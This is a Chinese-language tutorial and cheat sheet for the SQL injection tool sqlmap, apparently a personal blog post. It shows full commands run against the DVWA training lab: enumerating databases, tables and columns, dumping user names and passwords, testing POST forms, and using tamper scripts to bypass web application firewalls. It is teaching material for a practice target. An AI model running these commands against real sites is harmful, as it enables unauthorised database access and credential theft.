常用命令

python sqlmap.py -u "?" -cookie "?" --level 5 --current-db
python sqlmap.py -u "?" -cookie "?" --level 5 -T $ --tables
python sqlmap.py -u "?" -cookie "?" --level 5 -D $ -T $ --columns
python sqlmap.py -u "?" -cookie "?" --level 5 -D $ -T $ -C $ --dump

//把cookie带上方便检测cookie注入
// --level 5 就代表着有测试 user-agent
// 绕过空格: --tamper "space2comment.py"

 常用绕过脚本

sqlmap --tamper 绕过WAF脚本分类整理_whatday的博客-CSDN博客_sqlmap脚本

SQLMap常用脚本学习篇_three_years_No1的博客-CSDN博客_sqlmap常用脚本

sqlmap下载：

​​​​​​​sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool (github.com)

启动：

1.提前配置好python环境

2.在sqlmap的根目录下，写一个bat处理文件

@echo off
cmd /k "python sqlmap.py -h"

如：

双击即可bat文件即可启动 

中文版选项：

python sqlmap.py -h 查看原文帮助手册

中文版原文链接：https://blog.csdn.net/smli_ng/article/details/106026901

常用语句

以dvwa靶场的low级别的SQL Injection为例

1.先随便输入一个数字，获得注入的url

 2.复制url，到sqlmap中待用

3.经典的四步骤：查数据库，查表，查字段，查数据

查数据库：

查所有数据库

python sqlmap.py -u "http://39.101.162.123:44729/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4d099mj6tpcq8j3q17r8gtuhj2; security=low" --dbs

 查当前数据库

python sqlmap.py -u "http://39.101.162.123:44729/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4d099mj6tpcq8j3q17r8gtuhj2; security=low" --current-db

dvwa就是当前连接的数据库 

查表,查列

python sqlmap.py -u "http://39.101.162.123:44729/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4d099mj6tpcq8j3q17r8gtuhj2; security=low" --tables --columns

如图，列和表都直接跑出来了 

查数据

显然我们要查的应该是dvwa 下的users 下的user和password

python sqlmap.py -u "http://39.101.162.123:44729/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4d099mj6tpcq8j3q17r8gtuhj2; security=low" -D dvwa -T users -C user,password --dump

如图，结果出来了 

Post型注入

与get型不同，因为get型的参数在url栏，

1.

python sqlmap.py -u "???" -cookie="???" --forms

--forms就是sqlmap自动搜集表单

2.指定参数

python sqlmap.py -u "??" --data "n=1"
或者
python sqlmap.py -u "??" --data "n=1&m=1"